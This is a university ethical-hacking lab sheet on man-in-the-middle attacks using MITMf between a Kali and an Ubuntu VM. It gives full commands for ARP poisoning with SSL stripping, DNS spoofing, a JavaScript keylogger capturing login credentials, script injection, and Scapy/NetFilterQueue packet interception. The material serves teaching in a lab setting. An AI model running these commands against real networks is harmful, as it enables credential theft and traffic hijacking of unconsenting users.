CSCI369 Ethical Hacking

This material is copyrighted. It must not be

distributed without permission from
Joonsang Baek and Jongkil Kim

Lab 4
Spoofing with MITMf

NOTE: Make sure that your Kali VM is running on VB fine and network is set as
“NatNetwork”. You also need Ubuntu VM for today’s task. You can configure
Ubuntu in the same way as Kali. Check whether Kali and Ubuntu communicate
with each other through NatNetwork using ping command.

1. Performing ARP Poisoning using mitmf

a. MITMf (Man-in-the-middle framework) is more powerful than arpspoof.

We first need to install it on Kali VM.
[Note] Before start installation, make packages information up-to-date by
running $ apt-get update
1) First, in Kali VM, you visit
https://github.com/byt3bl33d3r/MITMf/wiki/Installation, and follow
the instructions for the installation.
2) It should be noted that Kali belongs to “Debian and derivatives”. Also,
while installing, you have to load the shell file using the command
“source /usr/bin/virtualenvwrapper.sh”. But, in Kali, there is no
folder “/usr/bin/..”. You have to use “/usr/local/bin/..”.
3) Make sure that /proc/sys/net/ipv4/ip_forward is set 1. You can type
$ head /proc/sys/net/ipv4/ip_forward
If the result is 0, execute the following command:
$ echo 1 > /proc/sys/net/ipv4/ip_forward

b. If the installation is finished, go back to Ubuntu VM. Run arp –a (or

route -n) to check the MAC address of the gateway.

c. Return to Kali VM and in the folder where MITMf is installed, run

$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0

Go back to Ubuntu VM and open a web browser and go to www.yahoo.com.

Enter any user name. If you have an account, try to sign in.

Note that SSL strip will work if your www.yahoo.com is not on the HSTS
(HTTP Strict Transport Security) list. If the SSL strip does not work well, it
may mean that www.yahoo.com is on HSTS list. If you want to remove
www.yahoo.com from HSTS in the Firefox browser,
1) Close all open tabs
2) Open the browsing history (Ctrl + Shift + H)
3) Search "yahoo"
4) Right click on all sites under yahoo.com and select "Forget About This
Site".
5) Make sure that you access www.yahoo.com again while mitmf in Kali
VM is running.

1
 CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim

Check what happens on the terminal of Kali VM. Can you see username (and
password, if you have an account)?

2. Performing DNS Spoofing using mitmf

Another interesting attack you can also perform using mitmf is DNS spoofing.
– When a victim try to open a website on the target machine, he/she will be
redirected to a different web site the attacker has set up.

First we need to set up our web site on Kali VM. Then go to

/var/www/html/ Then change file name of index.html: cp index.html
index2. Then create a new index.html: leafpad index.html html
(Alternatively you can run leafpad /var/www/html/index.html)
Write any simple html code, for example:
- Replace “Apache2 Ubuntu Default Page” to “You’re hacked!”
Save the file and exit. Then, run a web server on our Kali VM: service
apache2 start

As a next step, we modify mitmf.conf file located at /etc/mitmf. To do this

run leafpad /etc/mitmf/mitmf.conf

You will see

[[[A]]] #Queries for IPv4 address records

*.live.com = some IP address

Now add *.unsw.edu.au and = < IP of kali VM>, save the change.

Then, run the following command:

$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0 --dns

All are set now. Open a web browser at Ubuntu VM and go to

http://unsw.edu.au. What’s happening?
[Note] Do not forget to stop apache server in Kali VM.
($ service apache2 stop)

3. Key logging using MITMf

We can capture username and password by simply running mitmf on our
target, but by putting key logging option will allow us to capture whatever
the user in the target machine types in the input field of any http web sites
the user visits.

a. In Kali VM, run

$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0 --
jskeylogger

2
 CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim

b. Go back to Ubuntu VM and open a web browser, go to

solss.uow.edu.au/sid/sols_login_ctl.login to do type any texts in username
and password. At the same time, observe the terminal in Kali VM. Can you
see the ID and password that the victim types in?

4. Script injection using MITMf

a. Return to Kali VM and run
$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0 --inject --
js-payload “alert(‘Hello World’);”

b. Note that there are a lot of options for “inject”. (Please check using mitmf
– h|less). Go back to Ubuntu VM and open a web browser and visit
www.uow.edu.au. What happens?

c. We have used –js-payload. Can we inject javascript file? You can use – js-
file option to inject a javascript file. Create a javascript file using text
editor (file name: inject.js) and inject the file into the target’s web browser
by running
$ python mitmf.py --arp --spoof --gateway <IP of
gateway> --target <IP of Ubuntu> -i eth0 --inject --
js-file ./inject.js

If you are familiar with javascript, you can inject something more interesting.
Try! Note that we can do much more powerful thing with this later on.

5. (Advanced work with mitmf) Although mitmf itself is a very powerful tool, an
ethical hacker wants to do more than tailored attacks than that were already
implemented in mitmf. They want to do work that is more advanced. One
possible way to use Scapy and NetFilterQueue to analyze and manipulate the
packets on live traffic.
Note: The role of the program NetFilterQueue is to enable manipulate packets
(matched by iptables in Unix) using Python.

a. Your task is to write a Python function to display IP addresses of servers

that the victim connects to, using Scapy and NetFilterQueue. Assume that
the victim is Ubuntu VM.

1) Install NetFilterQueue using the following commands:

$ sudo apt-get install build-essential python-dev
libnetfilter-queue-dev
$ git clone https://github.com/fqrouter/python-
netfilterqueue.git
$ cd python-netfilterqueue
$ python setup.py install

2) Run mitmf for the arp spoofing. For example, if the gateway IP address is
10.0.2.1 and the victim IP address is 10.0.2.15, then you can run the
following command to hijacking the traffic:

3
 CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim

$ python mitmf.py --arp --spoof --gateway 10.0.2.1 --

target 10.0.2.15 -i eth0

3) Add IP routing table using the following command. This will redirect
incoming traffic to NetFilterQueue.
$ iptables -t nat -A PREROUTING -j NFQUEUE --queue-
num 1

(Tips: You can check the routing table by typing

iptables -t nat –L
If you can see multiple rules in PREROUTING, you can
remove it by using:
Iptables –t nat –D PREROUTING <rule number>)

4) Create Lab6.py, implement your_function and execute the following

program in Kali VM. Then, print out the information of captured packets
using scapy (e.g, print pkt.summary()).
from netfilterqueue import NetfilterQueue
from scapy.all import *
import os

def your_function(pkt): #Your task

def callback(packet):
payload = packet.get_payload() #extract payload
of a packet
pkt = IP(payload) #copy the packet to pkt using
Scapy

your_function(pkt) #Call your function

packet.accept() #release the packet to the

network

def main():
q = NetfilterQueue() #set NetfilterQueue()
q.bind(1, callback) #set the size of queue and
bind NetfilterQueue object to the function you define
try:
q.run() # Main loop
except KeyboardInterrupt:
q.unbind() #release binding

main()

5) Access some sites in Ubuntu VM and check whether you can see the
information of the packet, properly.